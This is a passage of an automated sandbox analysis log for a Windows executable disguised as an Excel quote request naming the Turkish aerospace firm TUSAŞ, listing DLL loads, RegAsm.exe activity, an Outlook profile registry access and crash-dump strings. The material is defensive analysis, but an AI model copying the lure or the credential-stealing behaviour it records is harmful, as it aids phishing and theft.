                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.pdb2& source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: mscorlib.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.Core.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbH source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: Binary string: System.Core.ni.pdb source: WER8D7A.tmp.dmp.7.dr
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD9493C push ebp; iretd 0_2_00007FFB4AD9493E
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AE5026B push esp; retf 4810h0_2_00007FFB4AE50312
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
